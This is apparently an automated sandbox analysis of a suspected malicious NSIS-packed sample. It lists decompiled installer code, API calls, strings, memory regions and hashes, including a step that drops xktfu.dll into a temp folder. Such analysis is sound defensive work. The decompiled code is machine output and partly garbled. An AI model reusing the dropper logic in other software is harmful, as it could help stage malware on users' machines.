                							__eflags =  *0x42f4e0;
                							if( *0x42f4e0 != 0) {
                								_t28 = E004052F0(_t27, 0);
                								__eflags = _t28;
                								if(_t28 == 0) {
                									E0040140B(1);
                									goto L33;
                								}
                								__eflags =  *0x42ebec; // 0x0
                								if(__eflags == 0) {
                									E0040140B(2);
                								}
                								goto L22;
                							}
                							ShowWindow( *0x42a870, 5);
                							_t34 = E00406492("RichEd20");
                							__eflags = _t34;
                							if(_t34 == 0) {
                								E00406492("RichEd32");
                							}
                							_t81 = "RichEdit20A";
                							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
                							__eflags = _t35;
                							if(_t35 == 0) {
                								GetClassInfoA(0, "RichEdit", 0x42ebc0);
                								 *0x42ebe4 = _t81;
                								RegisterClassA(0x42ebc0);
                							}
                							_t36 =  *0x42ec00; // 0x0
                							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0);
                							E0040385A(E0040140B(5), 1);
                							return _t39;
                						}
                						L22:
                						_t31 = 2;
                						return _t31;
                					} else {
                						_t71 =  *0x42f420;
                						 *0x42ebc4 = E00401000;
                						 *0x42ebd0 =  *0x42f420;
                						 *0x42ebd4 = _t25;
                						 *0x42ebe4 = 0x40a1f4;
                						if(RegisterClassA(0x42ebc0) == 0) {
                							L33:
                							__eflags = 0;
                							return 0;
                						}
                						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
                						goto L21;
                					}
                				} else {
                					_t71 =  *(_t76 + 0x48);
                					_t86 = _t71;
                					if(_t71 == 0) {
                						goto L16;
                					}
                					_t74 = 0x42e3c0;
                					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
                					_t57 =  *0x42e3c0; // 0x43
                					if(_t57 == 0) {
                						goto L16;
                					}
                					if(_t57 == 0x22) {
                						_t74 = 0x42e3c1;
                						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
                					}
                					_t59 = lstrlenA(_t74) + _t74 - 4;
                					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                						L15:
                						E004060F7(_t80, E00405A8F(_t74));
                						goto L16;
                					} else {
                						_t63 = GetFileAttributesA(_t74);
                						if(_t63 == 0xffffffff) {
                							L14:
                							E00405AD6(_t74);
                							goto L15;
                						}
                						_t92 = _t63 & 0x00000010;
                						if((_t63 & 0x00000010) != 0) {
                							goto L15;
                						}
                						goto L14;
                					}
                				}
                			}


                APIs
                  • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                  • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                • GetUserDefaultUILanguage.KERNELBASE(00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000000), ref: 00403924
                  • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000000), ref: 00403985
                • lstrlenA.KERNEL32(Cgrlcpdlsle,?,?,?,Cgrlcpdlsle,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90), ref: 004039FA
                • lstrcmpiA.KERNEL32(?,.exe,Cgrlcpdlsle,?,?,?,Cgrlcpdlsle,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                • GetFileAttributesA.KERNEL32(Cgrlcpdlsle), ref: 00403A18
                • LoadImageA.USER32 ref: 00403A61
                • RegisterClassA.USER32 ref: 00403A9E
                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                • CreateWindowExA.USER32 ref: 00403AEB
                • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                • GetClassInfoA.USER32 ref: 00403B4D
                • GetClassInfoA.USER32 ref: 00403B5A
                • RegisterClassA.USER32 ref: 00403B63
                • DialogBoxParamA.USER32 ref: 00403B82
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                • String ID: "C:\Users\user\Desktop\bGf2H3tXGg.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Cgrlcpdlsle$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                • API String ID: 606308-3966943423
                • Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                • Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E00402EA1(void* __eflags, signed int _a4) {
                				DWORD* _v8;
                				DWORD* _v12;
                				void* _v16;
                				intOrPtr _v20;
                				long _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				signed int _v44;
                				long _t43;
                				long _t50;
                				void* _t57;
                				intOrPtr* _t59;
                				long _t60;
                				long _t70;
                				signed int _t77;
                				intOrPtr _t80;
                				long _t82;
                				void* _t85;
                				signed int _t87;
                				void* _t89;
                				long _t90;
                				long _t93;
                				intOrPtr* _t94;
                
                				_t82 = 0;
                				_v12 = 0;
                				_v8 = 0;
                				_t43 = GetTickCount();
                				_t91 = "C:\\Users\\alfons\\Desktop\\bGf2H3tXGg.exe";
                				 *0x42f430 = _t43 + 0x3e8;
                				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\bGf2H3tXGg.exe", 0x400);
                				_t89 = E00405C90(_t91, 0x80000000, 3);
                				_v16 = _t89;
                				 *0x40a018 = _t89;
                				if(_t89 == 0xffffffff) {
                					return "Error launching installer";
                				}
                				_t92 = "C:\\Users\\alfons\\Desktop";
                				E004060F7("C:\\Users\\alfons\\Desktop", _t91);
                				E004060F7(0x437000, E00405AD6(_t92));
                				_t50 = GetFileSize(_t89, 0);
                				 *0x42944c = _t50;
                				_t93 = _t50;
                				if(_t50 <= 0) {
                					L24:
                					E00402E3D(1);
                					if( *0x42f438 == _t82) {
                						goto L29;
                					}
                					if(_v8 == _t82) {
                						L28:
                						_t94 = GlobalAlloc(0x40, _v24);
                						E00403300( *0x42f438 + 0x1c);
                						_push(_v24);
                						_push(_t94);
                						_push(_t82);
                						_push(0xffffffff); // executed
                						_t57 = E004030D8(); // executed
                						if(_t57 == _v24) {
                							 *0x42f434 = _t94;
                							 *0x42f43c =  *_t94;
                							if((_v44 & 0x00000001) != 0) {
                								 *0x42f440 =  *0x42f440 + 1;
                							}
                							_t40 = _t94 + 0x44; // 0x44
                							_t59 = _t40;
                							_t85 = 8;
                							do {
                								_t59 = _t59 - 8;
                								 *_t59 =  *_t59 + _t94;
                								_t85 = _t85 - 1;
                							} while (_t85 != 0);
                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                							 *(_t94 + 0x3c) = _t60;
                							E00405C4B(0x42f460, _t94 + 4, 0x40);
                							return 0;
                						}
                						goto L29;
                					}
                					E00403300( *0x41d440);
                					if(E004032EA( &_a4, 4) == 0 || _v12 != _a4) {
                						goto L29;
                					} else {
                						goto L28;
                					}
                				} else {
                					do {
                						_t90 = _t93;
                						asm("sbb eax, eax");
                						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
                						if(_t93 >= _t70) {
                							_t90 = _t70;
                						}
                						if(E004032EA(0x415440, _t90) == 0) {
                							E00402E3D(1);
                							L29:
                							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                						}
                						if( *0x42f438 != 0) {
                							if((_a4 & 0x00000002) == 0) {
                								E00402E3D(0);
                							}
                							goto L20;
                						}
                						E00405C4B( &_v44, 0x415440, 0x1c);
                						_t77 = _v44;
                						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                							_a4 = _a4 | _t77;
                							_t87 =  *0x41d440; // 0x63200
                							 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
                							_t80 = _v20;
                							 *0x42f438 = _t87;
                							if(_t80 > _t93) {
                								goto L29;
                							}
                							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                								_v8 = _v8 + 1;
                								_t24 = _t80 - 4; // 0x40a194
                								_t93 = _t24;
                								if(_t90 > _t93) {
                									_t90 = _t93;
                								}
                								goto L20;
                							} else {
                								break;
                							}
                						}
                						L20:
                						if(_t93 <  *0x42944c) {
                							_v12 = E004065B7(_v12, 0x415440, _t90);
                						}
                						 *0x41d440 =  *0x41d440 + _t90;
                						_t93 = _t93 - _t90;
                					} while (_t93 != 0);
                					_t82 = 0;
                					goto L24;
                				}
                			}


                APIs
                • GetTickCount.KERNEL32 ref: 00402EB2
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\bGf2H3tXGg.exe,00000400), ref: 00402ECE
                  • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00405C94
                  • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\bGf2H3tXGg.exe,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00402F1A
                • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                • String ID: "C:\Users\user\Desktop\bGf2H3tXGg.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\bGf2H3tXGg.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                • API String ID: 2803837635-3455945839
                • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00401759(FILETIME* __ebx, void* __eflags) {
                				void* _t33;
                				void* _t41;
                				void* _t43;
                				FILETIME* _t49;
                				FILETIME* _t62;
                				void* _t64;
                				signed int _t70;
                				FILETIME* _t71;
                				FILETIME* _t75;
                				signed int _t77;
                				void* _t80;
                				CHAR* _t82;
                				CHAR* _t83;
                				void* _t85;
                
                				_t75 = __ebx;
                				_t82 = E00402BCE(0x31);
                				 *(_t85 - 8) = _t82;
                				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                				_t33 = E00405AFC(_t82);
                				_push(_t82);
                				_t83 = "Cgrlcpdlsle";
                				if(_t33 == 0) {
                					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
                				} else {
                					E004060F7();
                				}
                				E004063D2(_t83);
                				while(1) {
                					__eflags =  *(_t85 + 8) - 3;
                					if( *(_t85 + 8) >= 3) {
                						_t64 = E0040646B(_t83);
                						_t77 = 0;
                						__eflags = _t64 - _t75;
                						if(_t64 != _t75) {
                							_t71 = _t64 + 0x14;
                							__eflags = _t71;
                							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                						}
                						asm("sbb eax, eax");
                						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                						__eflags = _t70;
                						 *(_t85 + 8) = _t70;
                					}
                					__eflags =  *(_t85 + 8) - _t75;
                					if( *(_t85 + 8) == _t75) {
                						E00405C6B(_t83);
                					}
                					__eflags =  *(_t85 + 8) - 1;
                					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                					__eflags = _t41 - 0xffffffff;
                					 *(_t85 - 0xc) = _t41;
                					if(_t41 != 0xffffffff) {
                						break;
                					}
                					__eflags =  *(_t85 + 8) - _t75;
                					if( *(_t85 + 8) != _t75) {
                						E0040521E(0xffffffe2,  *(_t85 - 8));
                						__eflags =  *(_t85 + 8) - 2;
                						if(__eflags == 0) {
                							 *((intOrPtr*)(_t85 - 4)) = 1;
                						}
                						L31:
                						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
                						__eflags =  *0x42f4c8;
                						goto L32;
                					} else {
                						E004060F7(0x40ac38, 0x430000);
                						E004060F7(0x430000, _t83);
                						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\alfons\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll",  *((intOrPtr*)(_t85 - 0x14)));
                						E004060F7(0x430000, 0x40ac38);
                						_t62 = E00405813("C:\Users\alfons\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll",  *(_t85 - 0x28) >> 3) - 4;
                						__eflags = _t62;
                						if(_t62 == 0) {
                							continue;
                						} else {
                							__eflags = _t62 == 1;
                							if(_t62 == 1) {
                								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
                								L32:
                								_t49 = 0;
                								__eflags = 0;
                							} else {
                								_push(_t83);
                								_push(0xfffffffa);
                								E0040521E();
                								L29:
                								_t49 = 0x7fffffff;
                							}
                						}
                					}
                					L33:
                					return _t49;
                				}
                				E0040521E(0xffffffea,  *(_t85 - 8));
                				 *0x42f4f4 =  *0x42f4f4 + 1;
                				_push(_t75);
                				_push(_t75);
                				_push( *(_t85 - 0xc));
                				_push( *((intOrPtr*)(_t85 - 0x20)));
                				_t43 = E004030D8(); // executed
                				 *0x42f4f4 =  *0x42f4f4 - 1;
                				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                				_t80 = _t43;
                				if( *(_t85 - 0x1c) != 0xffffffff) {
                					L22:
                					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                				} else {
                					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                						goto L22;
                					}
                				}
                				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                				__eflags = _t80 - _t75;
                				if(_t80 >= _t75) {
                					goto L31;
                				} else {
                					__eflags = _t80 - 0xfffffffe;
                					if(_t80 != 0xfffffffe) {
                						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
                					} else {
                						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
                						lstrcatA(_t83,  *(_t85 - 8));
                					}
                					_push(0x200010);
                					_push(_t83);
                					E00405813();
                					goto L29;
                				}
                				goto L33;
                			}

                APIs
                • lstrcatA.KERNEL32(00000000,00000000,Cgrlcpdlsle,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                • CompareFileTime.KERNEL32(-00000014,?,Cgrlcpdlsle,Cgrlcpdlsle,00000000,00000000,Cgrlcpdlsle,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                  • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Template Method Pattern Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                  • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422848,7519EA30), ref: 0040527A
                  • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll$Cgrlcpdlsle
                • API String ID: 1941528284-3668077838
                • Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                • Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02280807
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 022809D4
                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction ID: 5dc702b8885b361dcaa72ee4afb96c8a780c726e9f22398c198606e1197aa8b7
                • Opcode Fuzzy Hash: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction Fuzzy Hash: ACA1F230D22249EFEF20EFE4C845BADBBB1AF08715F20855AE514BA2A4D3749A54DF50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                				signed int _v8;
                				int _v12;
                				intOrPtr _v16;
                				long _v20;
                				intOrPtr _v24;
                				char _v88;
                				void* _t65;
                				void* _t69;
                				long _t70;
                				intOrPtr _t75;
                				long _t76;
                				intOrPtr _t77;
                				void* _t78;
                				int _t88;
                				intOrPtr _t92;
                				intOrPtr _t95;
                				long _t96;
                				signed int _t97;
                				int _t98;
                				int _t99;
                				intOrPtr _t100;
                				void* _t101;
                				void* _t102;
                
                				_t97 = _a16;
                				_t92 = _a12;
                				_v12 = _t97;
                				if(_t92 == 0) {
                					_v12 = 0x8000;
                				}
                				_v8 = _v8 & 0x00000000;
                				_v16 = _t92;
                				if(_t92 == 0) {
                					_v16 = 0x421448;
                				}
                				_t62 = _a4;
                				if(_a4 >= 0) {
                					E00403300( *0x42f498 + _t62);
                				}
                				if(E004032EA( &_a16, 4) == 0) {
                					L41:
                					_push(0xfffffffd);
                					goto L42;
                				} else {
                					if((_a19 & 0x00000080) == 0) {
                						if(_t92 != 0) {
                							if(_a16 < _t97) {
                								_t97 = _a16;
                							}
                							if(E004032EA(_t92, _t97) != 0) {
                								_v8 = _t97;
                								L44:
                								return _v8;
                							} else {
                								goto L41;
                							}
                						}
                						if(_a16 <= _t92) {
                							goto L44;
                						}
                						_t88 = _v12;
                						while(1) {
                							_t98 = _a16;
                							if(_a16 >= _t88) {
                								_t98 = _t88;
                							}
                							if(E004032EA(0x41d448, _t98) == 0) {
                								goto L41;
                							}
                							_t69 = E00405D37(_a8, 0x41d448, _t98); // executed
                							if(_t69 == 0) {
                								L28:
                								_push(0xfffffffe);
                								L42:
                								_pop(_t65);
                								return _t65;
                							}
                							_v8 = _v8 + _t98;
                							_a16 = _a16 - _t98;
                							if(_a16 > 0) {
                								continue;
                							}
                							goto L44;
                						}
                						goto L41;
                					}
                					_t70 = GetTickCount();
                					 *0x40bdac =  *0x40bdac & 0x00000000;
                					 *0x40bda8 =  *0x40bda8 & 0x00000000;
                					_t14 =  &_a16;
                					 *_t14 = _a16 & 0x7fffffff;
                					_v20 = _t70;
                					 *0x40b890 = 8;
                					 *0x415438 = 0x40d430;
                					 *0x415434 = 0x40d430;
                					 *0x415430 = 0x415430;
                					_a4 = _a16;
                					if( *_t14 <= 0) {
                						goto L44;
                					} else {
                						goto L9;
                					}
                					while(1) {
                						L9:
                						_t99 = 0x4000;
                						if(_a16 < 0x4000) {
                							_t99 = _a16;
                						}
                						if(E004032EA(0x41d448, _t99) == 0) {
                							goto L41;
                						}
                						_a16 = _a16 - _t99;
                						 *0x40b880 = 0x41d448;
                						 *0x40b884 = _t99;
                						while(1) {
                							_t95 = _v16;
                							 *0x40b888 = _t95;
                							 *0x40b88c = _v12;
                							_t75 = E00406625(0x40b880);
                							_v24 = _t75;
                							if(_t75 < 0) {
                								break;
                							}
                							_t100 =  *0x40b888; // 0x422848
                							_t101 = _t100 - _t95;
                							_t76 = GetTickCount();
                							_t96 = _t76;
                							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                								_t102 = _t102 + 0xc;
                								E0040521E(0,  &_v88);
                								_v20 = _t96;
                							}
                							if(_t101 == 0) {
                								if(_a16 > 0) {
                									goto L9;
                								}
                								goto L44;
                							} else {
                								if(_a12 != 0) {
                									_t77 =  *0x40b888; // 0x422848
                									_v8 = _v8 + _t101;
                									_v12 = _v12 - _t101;
                									_v16 = _t77;
                									L23:
                									if(_v24 != 1) {
                										continue;
                									}
                									goto L44;
                								}
                								_t78 = E00405D37(_a8, _v16, _t101); // executed
                								if(_t78 == 0) {
                									goto L28;
                								}
                								_v8 = _v8 + _t101;
                								goto L23;
                							}
                						}
                						_push(0xfffffffc);
                						goto L42;
                					}
                					goto L41;
                				}
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CountTick$wsprintf
                • String ID: ... %d%%$H(B
                • API String ID: 551687249-2300805546
                • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004056E4(CHAR* _a4) {
                				struct _SECURITY_ATTRIBUTES _v16;
                				struct _SECURITY_DESCRIPTOR _v36;
                				int _t22;
                				long _t23;
                
                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                				_v36.Owner = 0x408384;
                				_v36.Group = 0x408384;
                				_v36.Sacl = _v36.Sacl & 0x00000000;
                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                				_v16.lpSecurityDescriptor =  &_v36;
                				_v36.Revision = 1;
                				_v36.Control = 4;
                				_v36.Dacl = 0x408374;
                				_v16.nLength = 0xc;
                				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                				if(_t22 != 0) {
                					L1:
                					return 0;
                				}
                				_t23 = GetLastError();
                				if(_t23 == 0xb7) {
                					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                						goto L1;
                					}
                					return GetLastError();
                				}
                				return _t23;
                			}

                APIs
                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                • GetLastError.KERNEL32 ref: 0040573B
                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                • GetLastError.KERNEL32 ref: 0040575A
                Strings
                • C:\Users\user\Desktop, xrefs: 004056E4
                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorLast$CreateDirectoryFileSecurity
                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                • API String ID: 3449924974-1521822154
                • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
